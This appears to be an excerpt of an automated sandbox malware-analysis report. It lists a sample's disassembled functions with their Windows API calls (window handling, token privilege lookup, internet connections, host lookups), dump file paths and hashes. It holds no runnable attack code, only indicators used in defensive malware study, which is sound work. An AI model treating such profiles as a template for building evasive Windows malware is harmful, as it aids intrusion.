                                                              • Part of subcall function 0020387D: GetCurrentThreadId.KERNEL32 ref: 0020389E
                                                              • Part of subcall function 0020387D: AttachThreadInput.USER32(00000000,?,002052A7), ref: 002038A5
                                                            • GetCaretPos.USER32(?), ref: 0022519A
                                                            • ClientToScreen.USER32(00000000,?), ref: 002251D5
                                                            • GetForegroundWindow.USER32 ref: 002251DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: 39edd2e203381c269cde4fe597284d835b13930da232b40f93e901f447388428
                                                            • Instruction ID: f569c1e0f9d09a836790079fd280b61cdffb5074a5267069fbf4a36794ba6108
                                                            • Opcode Fuzzy Hash: 39edd2e203381c269cde4fe597284d835b13930da232b40f93e901f447388428
                                                            • Instruction Fuzzy Hash: CF314D75A00118AFCB00EFA5C985AEFB7FDEF99300F10806AE405E7251EB759E41CBA0
                                                            Function 0022C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • GetCursorPos.USER32(?), ref: 0022C7C2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001DBBFB,?,?,?,?,?), ref: 0022C7D7
                                                            • GetCursorPos.USER32(?), ref: 0022C824
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,001DBBFB,?,?,?), ref: 0022C85E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: 719d59785f5eb50ac53e9c83289eb6d132b0660eecd5e5beaf9f40d76eba5c8a
                                                            • Instruction ID: 9194687a5e4f6ac3e0627fd3e70df2b8a6494442990c08cf7fb5f1f226e99f06
                                                            • Opcode Fuzzy Hash: 719d59785f5eb50ac53e9c83289eb6d132b0660eecd5e5beaf9f40d76eba5c8a
                                                            • Instruction Fuzzy Hash: A9319635510028BFCB26CF98E898EEE7BBAEB49310F548065F9058B261C7315D61DFA1
                                                            Function 001F8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001F8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001F8669
                                                              • Part of subcall function 001F8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001F8673
                                                              • Part of subcall function 001F8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001F8682
                                                              • Part of subcall function 001F8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001F8689
                                                              • Part of subcall function 001F8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001F869F
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001F8BEB
                                                            • _memcmp.LIBCMT ref: 001F8C0E
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F8C44
                                                            • HeapFree.KERNEL32(00000000), ref: 001F8C4B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: 38dc9424aa43ec737e0ad5180fe0d791562665e30502beb73c4c32908153da95
                                                            • Instruction ID: cfc091f74e689110630cc79c8ffb0a8fc32eb22b66858515ced9b3ca3b29f105
                                                            • Opcode Fuzzy Hash: 38dc9424aa43ec737e0ad5180fe0d791562665e30502beb73c4c32908153da95
                                                            • Instruction Fuzzy Hash: 96217A71E4120CEFDB10DFA4C949BFEB7B8EF44354F144069E658AB240DB31AA06CB60
                                                            Function 001C0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __setmode.LIBCMT ref: 001C0BF2
                                                              • Part of subcall function 001A5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00207B20,?,?,00000000), ref: 001A5B8C
                                                              • Part of subcall function 001A5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00207B20,?,?,00000000,?,?), ref: 001A5BB0
                                                            • _fprintf.LIBCMT ref: 001C0C29
                                                            • OutputDebugStringW.KERNEL32(?), ref: 001F6331
                                                              • Part of subcall function 001C4CDA: _flsall.LIBCMT ref: 001C4CF3
                                                            • __setmode.LIBCMT ref: 001C0C5E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: 4cc0f901f9ca794811adcb14d60c84daf54c5606a555f4d429cb92ad2560f590
                                                            • Instruction ID: ad489c1fb60074b84ce3d21fd50059b7bf30e4dcf11b726dcc46b886187c9b07
                                                            • Opcode Fuzzy Hash: 4cc0f901f9ca794811adcb14d60c84daf54c5606a555f4d429cb92ad2560f590
                                                            • Instruction Fuzzy Hash: B1112736908208BBCB05B7B4AC46EBE7B699F76320F14015DF204971D2DF219D968795
                                                            Function 00211A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00211A97
                                                              • Part of subcall function 00211B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00211B40
                                                              • Part of subcall function 00211B21: InternetCloseHandle.WININET(00000000), ref: 00211BDD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: e48fd6a9f7b07f098852db9e941259beb6b7fec15decc2d15c76cf88a023e9c3
                                                            • Instruction ID: 5346da918c2c6b9fa13b51d945636753e8ec490e292c74bdfa996e0ecec15a73
                                                            • Opcode Fuzzy Hash: e48fd6a9f7b07f098852db9e941259beb6b7fec15decc2d15c76cf88a023e9c3
                                                            • Instruction Fuzzy Hash: FB21BE35214601BFDB259F609C04FFABBF9FF68700F10002AFA4196650EB71A9719BA0
                                                            Function 001FE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001FF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,001FE1C4,?,?,?,001FEFB7,00000000,000000EF,00000119,?,?), ref: 001FF5BC
                                                              • Part of subcall function 001FF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 001FF5E2
                                                              • Part of subcall function 001FF5AD: lstrcmpiW.KERNEL32(00000000,?,001FE1C4,?,?,?,001FEFB7,00000000,000000EF,00000119,?,?), ref: 001FF613
                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,001FEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 001FE1DD
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 001FE203
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,001FEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 001FE237
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            • Opcode ID: 41035fd5f5488e973da2a0544d80b6bdbf57f42ad718dc7cfc5652f2bc6e1f06
                                                            • Instruction ID: 96adf3a28a3f7e6afb946ff5c9ecc47aaa28e1a0ca66805892da59ca1c7b76ed
                                                            • Opcode Fuzzy Hash: 41035fd5f5488e973da2a0544d80b6bdbf57f42ad718dc7cfc5652f2bc6e1f06
                                                            • Instruction Fuzzy Hash: D0118E3A200349EFCB25AF64D849E7A77F8FF95350B40402AF906CB260FB71D85197A0
                                                            Function 001D5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 001D5351
                                                              • Part of subcall function 001C594C: __FF_MSGBANNER.LIBCMT ref: 001C5963
                                                              • Part of subcall function 001C594C: __NMSG_WRITE.LIBCMT ref: 001C596A
                                                              • Part of subcall function 001C594C: RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,00000000,?,?,?,001C1013,?), ref: 001C598F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: a99044c5352a09afb001fb14f85c9e0ce0d5ed8fac23b48fd651ef9f39f44894
                                                            • Instruction ID: be2b96361a7c90c74a7c39668ff95fb3a65038d16f8e59b601c372a08e223060
                                                            • Opcode Fuzzy Hash: a99044c5352a09afb001fb14f85c9e0ce0d5ed8fac23b48fd651ef9f39f44894
                                                            • Instruction Fuzzy Hash: B1119432904A15BFCB353FB4A845B6A3BA67F307E4B10442FF94596291DFB5C9418790
                                                            Function 001A4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 001A4560
                                                              • Part of subcall function 001A410D: _memset.LIBCMT ref: 001A418D
                                                              • Part of subcall function 001A410D: _wcscpy.LIBCMT ref: 001A41E1
                                                              • Part of subcall function 001A410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001A41F1
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 001A45B5
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001A45C4
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001DD6CE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: ecadd648084d51fb92422aa1575d237965ade4c1f57cd219086f8a1a7c0c1a00
                                                            • Instruction ID: b903c8f652de4a8a62419089035b70414bf4dd3dabdf965f60d9980a9d41197f
                                                            • Opcode Fuzzy Hash: ecadd648084d51fb92422aa1575d237965ade4c1f57cd219086f8a1a7c0c1a00
                                                            • Instruction Fuzzy Hash: 8521FC74904784AFE7328B24EC59BE7BFEC9F51304F04009EE69D56245C7B45A89CB91
                                                            Function 002040B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002040D1
                                                            • _memset.LIBCMT ref: 002040F2
                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00204144
                                                            • CloseHandle.KERNEL32(00000000), ref: 0020414D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                            • String ID:
                                                            • API String ID: 1157408455-0
                                                            • Opcode ID: e247ce85ca62ea5e0bc62cda80021a9587e9130641ef3bd77f4d3b8aeb5fca74
                                                            • Instruction ID: 3c7d73020449cc47aff0c4f79a5727907f88b19acb47630b1c4682b48f2f1fad
                                                            • Opcode Fuzzy Hash: e247ce85ca62ea5e0bc62cda80021a9587e9130641ef3bd77f4d3b8aeb5fca74
                                                            • Instruction Fuzzy Hash: C111EB759113287AD7309BA5AC4DFABBB7CEF44760F1041AAF908E7180D6744E808BA4
                                                            Function 0021667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00207B20,?,?,00000000), ref: 001A5B8C
                                                              • Part of subcall function 001A5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00207B20,?,?,00000000,?,?), ref: 001A5BB0
                                                            • gethostbyname.WSOCK32(?,?,?), ref: 002166AC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002166B7
                                                            • _memmove.LIBCMT ref: 002166E4
                                                            • inet_ntoa.WSOCK32(?), ref: 002166EF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: 6c8eb05ec8aeb16110b6639677d8799762196895a7d72a3f855ac00d1c8e9134
                                                            • Instruction ID: d9ed91455e91547ce5451a2a5ef791e2e79a4ba02f83ca78c14bc4296500eb36
                                                            • Opcode Fuzzy Hash: 6c8eb05ec8aeb16110b6639677d8799762196895a7d72a3f855ac00d1c8e9134
                                                            • Instruction Fuzzy Hash: 97118239510509AFCB00FFA4DE86DEEB7B9EF65310B144065F502A7161DF30AE54CB61
                                                            Function 001F9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 001F9043
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001F9055
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001F906B
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001F9086
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 49f3795e913b68ef0dffc4befe5149073211225d3d79c172ee75820ea426a3b3
                                                            • Instruction ID: 9cf63061d1feee4e43596659eca3c680f81b23c1b732c3c026391b993b264728
                                                            • Opcode Fuzzy Hash: 49f3795e913b68ef0dffc4befe5149073211225d3d79c172ee75820ea426a3b3
                                                            • Instruction Fuzzy Hash: CE113A79900218BFDB10DFA5C984FADBB78FB48310F2040A5EA04B7250DB726E10DB90
                                                            Function 001A1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 001A12D8
                                                            • GetClientRect.USER32(?,?), ref: 001DB84B
                                                            • GetCursorPos.USER32(?), ref: 001DB855
                                                            • ScreenToClient.USER32(?,?), ref: 001DB860
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: 9876e0787d581b78a334701cd93af2e89400fbe49af35b65e1f0387f8c2600f6
                                                            • Instruction ID: 5986b6c9750f47f5e1f445c51bf1e06b773648d505b74b208fafcf8d6c5473c1
                                                            • Opcode Fuzzy Hash: 9876e0787d581b78a334701cd93af2e89400fbe49af35b65e1f0387f8c2600f6
                                                            • Instruction Fuzzy Hash: C4113D39500019BFCB10DF94D989AFE77B8EB06300F500466F911E7150C730BA528BA5
                                                            Function 00201652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002001FD,?,00201250,?,00008000), ref: 0020166F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,002001FD,?,00201250,?,00008000), ref: 00201694
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002001FD,?,00201250,?,00008000), ref: 0020169E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,002001FD,?,00201250,?,00008000), ref: 002016D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: ca62b8cfea0deaabf56dfa601231a0485dfc310bdaaae898df8f7c42b4cce65e
                                                            • Instruction ID: b5da52f2160e65a1f13c0038f0503e678982eaf95ae9d77ee0dd1e7fd2d7e637
                                                            • Opcode Fuzzy Hash: ca62b8cfea0deaabf56dfa601231a0485dfc310bdaaae898df8f7c42b4cce65e
                                                            • Instruction Fuzzy Hash: 99114531C20629EBCF009FA6ED48AEEBB7CFF09701F444069E944B2281CB7195718B96
                                                            Function 001D7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: 6270914f8c5851b9941e5d401f6ea8fed6fa387a0a2630327553ce1e6461add4
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: 6901803204418ABBCF165E84CC028EE3F22BF29354B498616FA1858271E337D9B1AB81
                                                            Function 0022B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 0022B59E
                                                            • ScreenToClient.USER32(?,?), ref: 0022B5B6
                                                            • ScreenToClient.USER32(?,?), ref: 0022B5DA
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0022B5F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
